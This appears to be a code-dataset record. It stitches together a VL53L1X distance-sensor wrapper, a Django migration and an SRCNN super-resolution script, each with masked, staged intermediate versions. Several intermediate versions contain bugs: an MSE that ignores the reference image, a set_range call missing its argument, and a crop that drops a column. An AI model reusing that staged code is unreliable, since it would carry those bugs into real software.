        if isinstance(address, str):
            address = int(address, 16)
        print("initialising sensor with address: {}".format(hex(address)))

        try:
            self.tof = VL53L1X.VL53L1X(i2c_bus=1, i2c_address=address)
            self.tof.open()
            self.tof.start_ranging(0)
            self.tof.set_timing(30000, 33)
        except Exception as e:
            # Best-effort init: log and continue so the caller can retry.
            print(e)

    def set_range(self, rng):
        """Set the ranging mode: 1 - short, 2 - medium, 3 - long.

        Raises Exception for values outside [0, 4).
        """
        if rng < 4 and rng >= 0:
            # Fixed: the original validated rng but called set_range()
            # without passing it on.
            self.tof.set_range(rng)
        else:
            raise Exception("Invalid range: 1 - short, 2 - med, 3 - long")

    def set_fov(self, mode):
        """Restrict the sensor's region of interest (ROI) on its 16x16 SPAD
        array. Unknown modes fall back to the full-array "wide" ROI."""
        if mode == "wide":
            roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)

        elif mode == "center":
            roi = VL53L1X.VL53L1xUserRoi(6, 9, 9, 6)

        elif mode == "top":
            roi = VL53L1X.VL53L1xUserRoi(6, 15, 9, 12)

        elif mode == "bottom":
            roi = VL53L1X.VL53L1xUserRoi(6, 3, 9, 0)

        elif mode == "left":
            roi = VL53L1X.VL53L1xUserRoi(0, 9, 3, 6)

        elif mode == "right":
            roi = VL53L1X.VL53L1xUserRoi(12, 9, 15, 6)

        else:
            roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)

        self.tof.set_user_roi(roi)

    def read(self):
        """Take one distance reading and wrap it in a Range message."""
        dist = self.tof.get_distance()

        msg = Range()
        msg.radiation_type = 1  # presumably sensor_msgs INFRARED — TODO confirm
        msg.field_of_view = 27  # NOTE(review): Range expects radians; 27 looks like degrees — confirm
        msg.min_range = 0
        msg.max_range = 400
        msg.range = float(dist)

        return msg
|
normal
|
{
"blob_id": "c6d9b971ab6919846807b740313d450d086ecc23",
"index": 7643,
"step-1": "<mask token>\n\n\nclass _VL53L1:\n <mask token>\n\n def set_range(self, rng):\n if rng < 4 and rng >= 0:\n self.tof.set_range()\n else:\n raise Exception('Invalid range: 1 - short, 2 - med, 3 - long')\n <mask token>\n\n def read(self):\n dist = self.tof.get_distance()\n msg = Range()\n msg.radiation_type = 1\n msg.field_of_view = 27\n msg.min_range = 0\n msg.max_range = 400\n msg.range = float(dist)\n return msg\n",
"step-2": "<mask token>\n\n\nclass _VL53L1:\n\n def __init__(self, address=41):\n address = int(address, 16)\n print('initialising sensor with address: {}'.format(hex(address)))\n try:\n self.tof = VL53L1X.VL53L1X(i2c_bus=1, i2c_address=address)\n self.tof.open()\n self.tof.start_ranging(0)\n self.tof.set_timing(30000, 33)\n except Exception as e:\n print(e)\n\n def set_range(self, rng):\n if rng < 4 and rng >= 0:\n self.tof.set_range()\n else:\n raise Exception('Invalid range: 1 - short, 2 - med, 3 - long')\n <mask token>\n\n def read(self):\n dist = self.tof.get_distance()\n msg = Range()\n msg.radiation_type = 1\n msg.field_of_view = 27\n msg.min_range = 0\n msg.max_range = 400\n msg.range = float(dist)\n return msg\n",
"step-3": "<mask token>\n\n\nclass _VL53L1:\n\n def __init__(self, address=41):\n address = int(address, 16)\n print('initialising sensor with address: {}'.format(hex(address)))\n try:\n self.tof = VL53L1X.VL53L1X(i2c_bus=1, i2c_address=address)\n self.tof.open()\n self.tof.start_ranging(0)\n self.tof.set_timing(30000, 33)\n except Exception as e:\n print(e)\n\n def set_range(self, rng):\n if rng < 4 and rng >= 0:\n self.tof.set_range()\n else:\n raise Exception('Invalid range: 1 - short, 2 - med, 3 - long')\n\n def set_fov(self, mode):\n if mode == 'wide':\n roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)\n elif mode == 'center':\n roi = VL53L1X.VL53L1xUserRoi(6, 9, 9, 6)\n elif mode == 'top':\n roi = VL53L1X.VL53L1xUserRoi(6, 15, 9, 12)\n elif mode == 'bottom':\n roi = VL53L1X.VL53L1xUserRoi(6, 3, 9, 0)\n elif mode == 'left':\n roi = VL53L1X.VL53L1xUserRoi(0, 9, 3, 6)\n elif mode == 'right':\n roi = VL53L1X.VL53L1xUserRoi(12, 9, 15, 6)\n else:\n roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)\n self.tof.set_user_roi(roi)\n\n def read(self):\n dist = self.tof.get_distance()\n msg = Range()\n msg.radiation_type = 1\n msg.field_of_view = 27\n msg.min_range = 0\n msg.max_range = 400\n msg.range = float(dist)\n return msg\n",
"step-4": "import VL53L1X\nfrom sensor_msgs.msg import Range\n\n\nclass _VL53L1:\n\n def __init__(self, address=41):\n address = int(address, 16)\n print('initialising sensor with address: {}'.format(hex(address)))\n try:\n self.tof = VL53L1X.VL53L1X(i2c_bus=1, i2c_address=address)\n self.tof.open()\n self.tof.start_ranging(0)\n self.tof.set_timing(30000, 33)\n except Exception as e:\n print(e)\n\n def set_range(self, rng):\n if rng < 4 and rng >= 0:\n self.tof.set_range()\n else:\n raise Exception('Invalid range: 1 - short, 2 - med, 3 - long')\n\n def set_fov(self, mode):\n if mode == 'wide':\n roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)\n elif mode == 'center':\n roi = VL53L1X.VL53L1xUserRoi(6, 9, 9, 6)\n elif mode == 'top':\n roi = VL53L1X.VL53L1xUserRoi(6, 15, 9, 12)\n elif mode == 'bottom':\n roi = VL53L1X.VL53L1xUserRoi(6, 3, 9, 0)\n elif mode == 'left':\n roi = VL53L1X.VL53L1xUserRoi(0, 9, 3, 6)\n elif mode == 'right':\n roi = VL53L1X.VL53L1xUserRoi(12, 9, 15, 6)\n else:\n roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)\n self.tof.set_user_roi(roi)\n\n def read(self):\n dist = self.tof.get_distance()\n msg = Range()\n msg.radiation_type = 1\n msg.field_of_view = 27\n msg.min_range = 0\n msg.max_range = 400\n msg.range = float(dist)\n return msg\n",
"step-5": "import VL53L1X\n\nfrom sensor_msgs.msg import Range\n\nclass _VL53L1():\n\n def __init__(self, address=0x29):\n address = int(address, 16)\n print(\"initialising sensor with address: {}\".format(hex(address)))\n \n try:\n self.tof = VL53L1X.VL53L1X(i2c_bus=1, i2c_address=address)\n self.tof.open()\n self.tof.start_ranging(0) \n self.tof.set_timing(30000, 33)\n except Exception as e:\n print(e)\n\n def set_range(self, rng):\n if rng < 4 and rng >= 0:\n self.tof.set_range()\n else:\n raise Exception(\"Invalid range: 1 - short, 2 - med, 3 - long\")\n\n def set_fov(self, mode):\n\n if mode == \"wide\": \n roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)\n\n elif mode == \"center\":\n roi = VL53L1X.VL53L1xUserRoi(6, 9, 9, 6)\n\n elif mode == \"top\":\n roi = VL53L1X.VL53L1xUserRoi(6, 15, 9, 12)\n\n elif mode == \"bottom\":\n roi = VL53L1X.VL53L1xUserRoi(6, 3, 9, 0)\n\n elif mode == \"left\":\n roi = VL53L1X.VL53L1xUserRoi(0, 9, 3, 6)\n\n elif mode == \"right\":\n roi = VL53L1X.VL53L1xUserRoi(12, 9, 15, 6)\n \n else:\n roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)\n\n self.tof.set_user_roi(roi)\n\n def read(self):\n\n dist = self.tof.get_distance()\n \n msg = Range()\n msg.radiation_type = 1\n msg.field_of_view = 27\n msg.min_range = 0\n msg.max_range = 400\n msg.range = float(dist)\n\n return msg ",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('autotasks', '0017_auto_20210210_1512')]
operations = [migrations.AddField(model_name='automatedtask', name=
'run_asap_after_missed', field=models.BooleanField(default=False))]
<|reserved_special_token_1|>
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [('autotasks', '0017_auto_20210210_1512')]
operations = [migrations.AddField(model_name='automatedtask', name=
'run_asap_after_missed', field=models.BooleanField(default=False))]
<|reserved_special_token_1|>
# Generated by Django 3.1.7 on 2021-02-24 05:37
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add the boolean field AutomatedTask.run_asap_after_missed
    (defaults to False) on top of migration 0017."""

    dependencies = [
        ('autotasks', '0017_auto_20210210_1512'),
    ]

    operations = [
        migrations.AddField(
            model_name='automatedtask',
            name='run_asap_after_missed',
            field=models.BooleanField(default=False),
        ),
    ]
|
flexible
|
{
"blob_id": "3ab1de77147f6abfabeea10f2a4e85686edffd6f",
"index": 2573,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('autotasks', '0017_auto_20210210_1512')]\n operations = [migrations.AddField(model_name='automatedtask', name=\n 'run_asap_after_missed', field=models.BooleanField(default=False))]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('autotasks', '0017_auto_20210210_1512')]\n operations = [migrations.AddField(model_name='automatedtask', name=\n 'run_asap_after_missed', field=models.BooleanField(default=False))]\n",
"step-5": "# Generated by Django 3.1.7 on 2021-02-24 05:37\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('autotasks', '0017_auto_20210210_1512'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='automatedtask',\n name='run_asap_after_missed',\n field=models.BooleanField(default=False),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun May 17 17:24:39 2020
@author: code
"""
import sys
import keras
import cv2
import numpy
import matplotlib
import skimage
print('Python: {}'.format(sys.version))
print('Numpy: {}'.format(numpy.__version__))
print('Keras: {}'.format(keras.__version__))
print('Matplotlib: {}'.format(matplotlib.__version__))
print('OpenCV: {}'.format(cv2.__version__))
print('Skimage: {}'.format(skimage.__version__))
#import necessary packages
from keras.models import Sequential
from keras.layers import Conv2D, Input
from keras.optimizers import SGD, Adam
from skimage.measure import compare_ssim as ssim
from matplotlib import pyplot as plt
import cv2
import numpy as np
import math
import os
#define A function for peak signal to noise ration(PSNR)
def psnr(target, ref):
    """Return the peak signal-to-noise ratio (dB) between two images.

    Assumes 8-bit pixel values (peak = 255). Works on RGB/BGR arrays.
    Returns float('inf') for identical images (the original divided by a
    zero RMSE and crashed in that case).
    """
    target_data = target.astype(float)
    ref_data = ref.astype(float)

    diff = ref_data - target_data
    diff = diff.flatten('C')

    rmse = math.sqrt(np.mean(diff ** 2))
    if rmse == 0:
        # Identical images: no noise, PSNR is unbounded.
        return float('inf')

    return 20 * math.log10(255. / rmse)
#define function for mean Squared error(MSE)
def mse(target, ref):
    """Return the mean squared error between two images.

    Fixed defect: the original computed np.sum(target ** 2) and never used
    `ref`, contradicting its own comment ("sum of the squared difference
    between the two images").
    """
    err = np.sum((target.astype('float') - ref.astype('float')) ** 2)
    err /= float(target.shape[0] * target.shape[1])

    return err
#define function that combines all three image quality metrics
def compare_images(target, ref):
    """Return [PSNR, MSE, SSIM] comparing `target` against `ref`."""
    return [
        psnr(target, ref),
        mse(target, ref),
        ssim(target, ref, multichannel=True),
    ]
#prepare degraded images by introducing quality distortions via resizing
def prepare_images(path, factor):
    """Create quality-degraded copies of every image under `path`.

    Each image is shrunk by `factor` and blown back up to its original
    size with bilinear interpolation, then written to the images/ folder.
    """
    for fname in os.listdir(path):
        img = cv2.imread(path + '/' + fname)

        # original size and the reduced size used for the degradation
        h, w, c = img.shape
        small = (int(w / factor), int(h / factor))

        # shrink, then enlarge back: loses detail, keeps dimensions
        img = cv2.resize(img, small, interpolation=cv2.INTER_LINEAR)
        img = cv2.resize(img, (int(w), int(h)), interpolation=cv2.INTER_LINEAR)

        print('Saving {}'.format(fname))
        cv2.imwrite('images//{}'.format(fname), img)
prepare_images('source_images/', 2)

# Evaluate each degraded image against its pristine original using the
# three image-quality metrics (PSNR, MSE, SSIM).
for file in os.listdir('images/'):
    
    # open target (degraded) and reference (original) images
    target = cv2.imread('images/{}'.format(file))
    ref = cv2.imread('source_images/{}'.format(file))
    
    # calculate the scores
    scores = compare_images(target, ref)
    
    # print all three scores
    print('{}\nPSNR: {}\nMSE: {}\nSSIM: {}\n'.format(file, scores[0], scores[1], scores[2]))
#define the SRCNN model
def model():
    """Build and compile the three-layer SRCNN network.

    Layer stack: 128 filters 9x9 (valid) -> 64 filters 3x3 (same)
    -> 1 filter 5x5 (valid, linear output); trained with Adam on MSE.
    """
    layers = [
        Conv2D(filters=128, kernel_size=(9, 9), activation='relu',
               padding='valid', use_bias=True, input_shape=(None, None, 1)),
        Conv2D(filters=64, kernel_size=(3, 3), activation='relu',
               padding='same', use_bias=True),
        Conv2D(filters=1, kernel_size=(5, 5), activation='linear',
               padding='valid', use_bias=True),
    ]

    srcnn = Sequential()
    for layer in layers:
        srcnn.add(layer)

    srcnn.compile(loss='mean_squared_error',
                  optimizer=Adam(learning_rate=0.0003),
                  metrics=['mean_squared_error'])
    return srcnn
#define necessary image processing functions
def modcrop(img, scale):
    """Crop `img` so both spatial dimensions are exact multiples of `scale`.

    Fixed defect: the original sliced columns as [1:sz[1]], which dropped
    the first column and returned width sz[1]-1 instead of sz[1].
    """
    tmpsz = img.shape
    sz = tmpsz[0:2]
    # Round each dimension down to the nearest multiple of scale.
    sz = sz - np.mod(sz, scale)
    img = img[0:sz[0], 0:sz[1]]
    return img
def shave(image, border):
    """Trim `border` pixels from every side of the image's first two axes."""
    inner = slice(border, -border)
    return image[inner, inner]
#define main prediction function
def predict(image_path):
    """Run SRCNN super-resolution on one degraded image.

    Loads pre-trained weights, reconstructs the luminance (Y) channel of
    the degraded image, and scores both the degraded and reconstructed
    images against the pristine reference with PSNR/MSE/SSIM.

    Returns:
        (ref, degraded, output, scores) where scores[0] compares the
        degraded image to the reference and scores[1] the SRCNN output.
    """
    
    # load the srcnn model with pre-trained weights
    srcnn =model()
    srcnn.load_weights('3051crop_weight_200.h5')
    
    # load the degraded image and its pristine reference of the same name
    path, file =os.path.split(image_path)
    degraded = cv2.imread(image_path)
    ref = cv2.imread('source_images/{}'.format(file))
    
    # crop both so dimensions are multiples of the scale factor (3)
    ref = modcrop(ref, 3)
    degraded = modcrop(degraded, 3)
    
    # convert to YCrCb -- SRCNN was trained on the Y (luminance) channel only
    temp =cv2.cvtColor(degraded, cv2.COLOR_BGR2YCrCb)
    
    # build the (batch, h, w, 1) network input and normalize Y to [0, 1]
    Y = np.zeros((1, temp.shape[0], temp.shape[1], 1), dtype = float)
    Y[0, :, :, 0] = temp[:, :, 0].astype(float)/ 255
    
    # perform super resolution with srcnn
    pre = srcnn.predict(Y, batch_size = 1)
    
    # post-process: rescale to [0, 255] and clip to the valid 8-bit range
    pre*= 255
    pre[pre[:] > 255] = 255
    pre[pre[:] < 0] = 0
    pre = pre.astype(np.uint8)
    
    # copy the reconstructed Y channel back and convert to BGR; shave 6 px
    # because the two 'valid' convolutions (9x9 and 5x5) trim 4+2 per side
    temp = shave(temp, 6)
    temp[:, :, 0] = pre[0, :, :, 0]
    output = cv2.cvtColor(temp, cv2.COLOR_YCrCb2BGR)
    
    # remove the same border from reference and degraded image so all
    # three images have matching dimensions for scoring
    ref = shave(ref.astype(np.uint8), 6)
    degraded = shave(degraded.astype(np.uint8), 6)
    
    # image quality calculations: degraded vs ref, then output vs ref
    scores = []
    scores.append(compare_images(degraded, ref))
    scores.append(compare_images(output, ref))
    
    # return images and scores
    return ref, degraded, output, scores
# run the full SRCNN pipeline on one sample image
ref, degraded, output, scores = predict('images/flowers.bmp')

# print the metric scores for the degraded and reconstructed images
print('Degraded Image: \nPSNR: {}\nMSE: {}\nSSIM: {}\n'.format(scores[0][0], scores[0][1], scores[0][2]))
print('Reconstructed Image: \nPSNR: {}\nMSE: {}\nSSIM: {}\n'.format(scores[1][0], scores[1][1], scores[1][2]))

# show original / degraded / reconstructed side by side
# (cv2 loads BGR; matplotlib expects RGB, hence the conversions)
fig, axs = plt.subplots(1, 3, figsize = (20, 8))
axs[0].imshow(cv2.cvtColor(ref, cv2.COLOR_BGR2RGB))
axs[0].set_title('Original')
axs[1].imshow(cv2.cvtColor(degraded, cv2.COLOR_BGR2RGB))
axs[1].set_title('Degraded')
axs[2].imshow(cv2.cvtColor(output, cv2.COLOR_BGR2RGB))
axs[2].set_title('SRCNN')


# remove the x and y tick marks
for ax in axs:
    ax.set_xticks([])
    ax.set_yticks([])
|
normal
|
{
"blob_id": "e086bebaa166abeea066fe49076f1b007858951f",
"index": 7052,
"step-1": "<mask token>\n\n\ndef compare_images(target, ref):\n scores = []\n scores.append(psnr(target, ref))\n scores.append(mse(target, ref))\n scores.append(ssim(target, ref, multichannel=True))\n return scores\n\n\ndef prepare_images(path, factor):\n for file in os.listdir(path):\n img = cv2.imread(path + '/' + file)\n h, w, c = img.shape\n new_height = h / factor\n new_width = w / factor\n img = cv2.resize(img, (int(new_width), int(new_height)),\n interpolation=cv2.INTER_LINEAR)\n img = cv2.resize(img, (int(w), int(h)), interpolation=cv2.INTER_LINEAR)\n print('Saving {}'.format(file))\n cv2.imwrite('images//{}'.format(file), img)\n\n\n<mask token>\n\n\ndef modcrop(img, scale):\n tmpsz = img.shape\n sz = tmpsz[0:2]\n sz = sz - np.mod(sz, scale)\n img = img[0:sz[0], 1:sz[1]]\n return img\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef psnr(target, ref):\n target_data = target.astype(float)\n ref_data = ref.astype(float)\n diff = ref_data - target_data\n diff = diff.flatten('C')\n rmse = math.sqrt(np.mean(diff ** 2))\n return 20 * math.log10(255.0 / rmse)\n\n\ndef mse(target, ref):\n err = np.sum(target.astype('float') ** 2)\n err /= float(target.shape[0] * target.shape[1])\n return err\n\n\ndef compare_images(target, ref):\n scores = []\n scores.append(psnr(target, ref))\n scores.append(mse(target, ref))\n scores.append(ssim(target, ref, multichannel=True))\n return scores\n\n\ndef prepare_images(path, factor):\n for file in os.listdir(path):\n img = cv2.imread(path + '/' + file)\n h, w, c = img.shape\n new_height = h / factor\n new_width = w / factor\n img = cv2.resize(img, (int(new_width), int(new_height)),\n interpolation=cv2.INTER_LINEAR)\n img = cv2.resize(img, (int(w), int(h)), interpolation=cv2.INTER_LINEAR)\n print('Saving {}'.format(file))\n cv2.imwrite('images//{}'.format(file), img)\n\n\n<mask token>\n\n\ndef modcrop(img, scale):\n tmpsz = img.shape\n sz = tmpsz[0:2]\n sz = sz - np.mod(sz, scale)\n img = img[0:sz[0], 1:sz[1]]\n return img\n\n\ndef shave(image, border):\n img = image[border:-border, border:-border]\n return img\n\n\ndef predict(image_path):\n srcnn = model()\n srcnn.load_weights('3051crop_weight_200.h5')\n path, file = os.path.split(image_path)\n degraded = cv2.imread(image_path)\n ref = cv2.imread('source_images/{}'.format(file))\n ref = modcrop(ref, 3)\n degraded = modcrop(degraded, 3)\n temp = cv2.cvtColor(degraded, cv2.COLOR_BGR2YCrCb)\n Y = np.zeros((1, temp.shape[0], temp.shape[1], 1), dtype=float)\n Y[0, :, :, 0] = temp[:, :, 0].astype(float) / 255\n pre = srcnn.predict(Y, batch_size=1)\n pre *= 255\n pre[pre[:] > 255] = 255\n pre[pre[:] < 0] = 0\n pre = pre.astype(np.uint8)\n temp = shave(temp, 6)\n temp[:, :, 0] = pre[0, :, :, 0]\n output = cv2.cvtColor(temp, cv2.COLOR_YCrCb2BGR)\n ref = shave(ref.astype(np.uint8), 6)\n 
degraded = shave(degraded.astype(np.uint8), 6)\n scores = []\n scores.append(compare_images(degraded, ref))\n scores.append(compare_images(output, ref))\n return ref, degraded, output, scores\n\n\n<mask token>\n",
"step-3": "<mask token>\nprint('Python: {}'.format(sys.version))\nprint('Numpy: {}'.format(numpy.__version__))\nprint('Keras: {}'.format(keras.__version__))\nprint('Matplotlib: {}'.format(matplotlib.__version__))\nprint('OpenCV: {}'.format(cv2.__version__))\nprint('Skimage: {}'.format(skimage.__version__))\n<mask token>\n\n\ndef psnr(target, ref):\n target_data = target.astype(float)\n ref_data = ref.astype(float)\n diff = ref_data - target_data\n diff = diff.flatten('C')\n rmse = math.sqrt(np.mean(diff ** 2))\n return 20 * math.log10(255.0 / rmse)\n\n\ndef mse(target, ref):\n err = np.sum(target.astype('float') ** 2)\n err /= float(target.shape[0] * target.shape[1])\n return err\n\n\ndef compare_images(target, ref):\n scores = []\n scores.append(psnr(target, ref))\n scores.append(mse(target, ref))\n scores.append(ssim(target, ref, multichannel=True))\n return scores\n\n\ndef prepare_images(path, factor):\n for file in os.listdir(path):\n img = cv2.imread(path + '/' + file)\n h, w, c = img.shape\n new_height = h / factor\n new_width = w / factor\n img = cv2.resize(img, (int(new_width), int(new_height)),\n interpolation=cv2.INTER_LINEAR)\n img = cv2.resize(img, (int(w), int(h)), interpolation=cv2.INTER_LINEAR)\n print('Saving {}'.format(file))\n cv2.imwrite('images//{}'.format(file), img)\n\n\nprepare_images('source_images/', 2)\nfor file in os.listdir('images/'):\n target = cv2.imread('images/{}'.format(file))\n ref = cv2.imread('source_images/{}'.format(file))\n scores = compare_images(target, ref)\n print('{}\\nPSNR: {}\\nMSE: {}\\nSSIM: {}\\n'.format(file, scores[0],\n scores[1], scores[2]))\n\n\ndef model():\n SRCNN = Sequential()\n SRCNN.add(Conv2D(filters=128, kernel_size=(9, 9), activation='relu',\n padding='valid', use_bias=True, input_shape=(None, None, 1)))\n SRCNN.add(Conv2D(filters=64, kernel_size=(3, 3), activation='relu',\n padding='same', use_bias=True))\n SRCNN.add(Conv2D(filters=1, kernel_size=(5, 5), activation='linear',\n padding='valid', 
use_bias=True))\n adam = Adam(learning_rate=0.0003)\n SRCNN.compile(loss='mean_squared_error', optimizer=adam, metrics=[\n 'mean_squared_error'])\n return SRCNN\n\n\ndef modcrop(img, scale):\n tmpsz = img.shape\n sz = tmpsz[0:2]\n sz = sz - np.mod(sz, scale)\n img = img[0:sz[0], 1:sz[1]]\n return img\n\n\ndef shave(image, border):\n img = image[border:-border, border:-border]\n return img\n\n\ndef predict(image_path):\n srcnn = model()\n srcnn.load_weights('3051crop_weight_200.h5')\n path, file = os.path.split(image_path)\n degraded = cv2.imread(image_path)\n ref = cv2.imread('source_images/{}'.format(file))\n ref = modcrop(ref, 3)\n degraded = modcrop(degraded, 3)\n temp = cv2.cvtColor(degraded, cv2.COLOR_BGR2YCrCb)\n Y = np.zeros((1, temp.shape[0], temp.shape[1], 1), dtype=float)\n Y[0, :, :, 0] = temp[:, :, 0].astype(float) / 255\n pre = srcnn.predict(Y, batch_size=1)\n pre *= 255\n pre[pre[:] > 255] = 255\n pre[pre[:] < 0] = 0\n pre = pre.astype(np.uint8)\n temp = shave(temp, 6)\n temp[:, :, 0] = pre[0, :, :, 0]\n output = cv2.cvtColor(temp, cv2.COLOR_YCrCb2BGR)\n ref = shave(ref.astype(np.uint8), 6)\n degraded = shave(degraded.astype(np.uint8), 6)\n scores = []\n scores.append(compare_images(degraded, ref))\n scores.append(compare_images(output, ref))\n return ref, degraded, output, scores\n\n\n<mask token>\nprint(\"\"\"Degraded Image: \nPSNR: {}\nMSE: {}\nSSIM: {}\n\"\"\".format(scores[0][0],\n scores[0][1], scores[0][2]))\nprint(\"\"\"Reconstructed Image: \nPSNR: {}\nMSE: {}\nSSIM: {}\n\"\"\".format(scores[\n 1][0], scores[1][1], scores[1][2]))\n<mask token>\naxs[0].imshow(cv2.cvtColor(ref, cv2.COLOR_BGR2RGB))\naxs[0].set_title('Original')\naxs[1].imshow(cv2.cvtColor(degraded, cv2.COLOR_BGR2RGB))\naxs[1].set_title('Degraded')\naxs[2].imshow(cv2.cvtColor(output, cv2.COLOR_BGR2RGB))\naxs[2].set_title('SRCNN')\nfor ax in axs:\n ax.set_xticks([])\n ax.set_yticks([])\n",
"step-4": "<mask token>\nprint('Python: {}'.format(sys.version))\nprint('Numpy: {}'.format(numpy.__version__))\nprint('Keras: {}'.format(keras.__version__))\nprint('Matplotlib: {}'.format(matplotlib.__version__))\nprint('OpenCV: {}'.format(cv2.__version__))\nprint('Skimage: {}'.format(skimage.__version__))\n<mask token>\n\n\ndef psnr(target, ref):\n target_data = target.astype(float)\n ref_data = ref.astype(float)\n diff = ref_data - target_data\n diff = diff.flatten('C')\n rmse = math.sqrt(np.mean(diff ** 2))\n return 20 * math.log10(255.0 / rmse)\n\n\ndef mse(target, ref):\n err = np.sum(target.astype('float') ** 2)\n err /= float(target.shape[0] * target.shape[1])\n return err\n\n\ndef compare_images(target, ref):\n scores = []\n scores.append(psnr(target, ref))\n scores.append(mse(target, ref))\n scores.append(ssim(target, ref, multichannel=True))\n return scores\n\n\ndef prepare_images(path, factor):\n for file in os.listdir(path):\n img = cv2.imread(path + '/' + file)\n h, w, c = img.shape\n new_height = h / factor\n new_width = w / factor\n img = cv2.resize(img, (int(new_width), int(new_height)),\n interpolation=cv2.INTER_LINEAR)\n img = cv2.resize(img, (int(w), int(h)), interpolation=cv2.INTER_LINEAR)\n print('Saving {}'.format(file))\n cv2.imwrite('images//{}'.format(file), img)\n\n\nprepare_images('source_images/', 2)\nfor file in os.listdir('images/'):\n target = cv2.imread('images/{}'.format(file))\n ref = cv2.imread('source_images/{}'.format(file))\n scores = compare_images(target, ref)\n print('{}\\nPSNR: {}\\nMSE: {}\\nSSIM: {}\\n'.format(file, scores[0],\n scores[1], scores[2]))\n\n\ndef model():\n SRCNN = Sequential()\n SRCNN.add(Conv2D(filters=128, kernel_size=(9, 9), activation='relu',\n padding='valid', use_bias=True, input_shape=(None, None, 1)))\n SRCNN.add(Conv2D(filters=64, kernel_size=(3, 3), activation='relu',\n padding='same', use_bias=True))\n SRCNN.add(Conv2D(filters=1, kernel_size=(5, 5), activation='linear',\n padding='valid', 
use_bias=True))\n adam = Adam(learning_rate=0.0003)\n SRCNN.compile(loss='mean_squared_error', optimizer=adam, metrics=[\n 'mean_squared_error'])\n return SRCNN\n\n\ndef modcrop(img, scale):\n tmpsz = img.shape\n sz = tmpsz[0:2]\n sz = sz - np.mod(sz, scale)\n img = img[0:sz[0], 1:sz[1]]\n return img\n\n\ndef shave(image, border):\n img = image[border:-border, border:-border]\n return img\n\n\ndef predict(image_path):\n srcnn = model()\n srcnn.load_weights('3051crop_weight_200.h5')\n path, file = os.path.split(image_path)\n degraded = cv2.imread(image_path)\n ref = cv2.imread('source_images/{}'.format(file))\n ref = modcrop(ref, 3)\n degraded = modcrop(degraded, 3)\n temp = cv2.cvtColor(degraded, cv2.COLOR_BGR2YCrCb)\n Y = np.zeros((1, temp.shape[0], temp.shape[1], 1), dtype=float)\n Y[0, :, :, 0] = temp[:, :, 0].astype(float) / 255\n pre = srcnn.predict(Y, batch_size=1)\n pre *= 255\n pre[pre[:] > 255] = 255\n pre[pre[:] < 0] = 0\n pre = pre.astype(np.uint8)\n temp = shave(temp, 6)\n temp[:, :, 0] = pre[0, :, :, 0]\n output = cv2.cvtColor(temp, cv2.COLOR_YCrCb2BGR)\n ref = shave(ref.astype(np.uint8), 6)\n degraded = shave(degraded.astype(np.uint8), 6)\n scores = []\n scores.append(compare_images(degraded, ref))\n scores.append(compare_images(output, ref))\n return ref, degraded, output, scores\n\n\nref, degraded, output, scores = predict('images/flowers.bmp')\nprint(\"\"\"Degraded Image: \nPSNR: {}\nMSE: {}\nSSIM: {}\n\"\"\".format(scores[0][0],\n scores[0][1], scores[0][2]))\nprint(\"\"\"Reconstructed Image: \nPSNR: {}\nMSE: {}\nSSIM: {}\n\"\"\".format(scores[\n 1][0], scores[1][1], scores[1][2]))\nfig, axs = plt.subplots(1, 3, figsize=(20, 8))\naxs[0].imshow(cv2.cvtColor(ref, cv2.COLOR_BGR2RGB))\naxs[0].set_title('Original')\naxs[1].imshow(cv2.cvtColor(degraded, cv2.COLOR_BGR2RGB))\naxs[1].set_title('Degraded')\naxs[2].imshow(cv2.cvtColor(output, cv2.COLOR_BGR2RGB))\naxs[2].set_title('SRCNN')\nfor ax in axs:\n ax.set_xticks([])\n ax.set_yticks([])\n",
"step-5": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 17 17:24:39 2020\n\n@author: code\n\"\"\"\n\nimport sys\nimport keras\nimport cv2\nimport numpy\nimport matplotlib\nimport skimage\n\nprint('Python: {}'.format(sys.version))\nprint('Numpy: {}'.format(numpy.__version__))\nprint('Keras: {}'.format(keras.__version__))\nprint('Matplotlib: {}'.format(matplotlib.__version__))\nprint('OpenCV: {}'.format(cv2.__version__))\nprint('Skimage: {}'.format(skimage.__version__))\n\n\n#import necessary packages\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D, Input\nfrom keras.optimizers import SGD, Adam\nfrom skimage.measure import compare_ssim as ssim\nfrom matplotlib import pyplot as plt\nimport cv2\nimport numpy as np\nimport math\nimport os\n\n#define A function for peak signal to noise ration(PSNR)\ndef psnr(target, ref):\n #assume RGB/BGR image\n target_data = target.astype(float)\n ref_data = ref.astype(float)\n \n diff = ref_data - target_data\n diff = diff.flatten('C')\n \n rmse = math.sqrt(np.mean(diff ** 2))\n \n return 20*math.log10(255. 
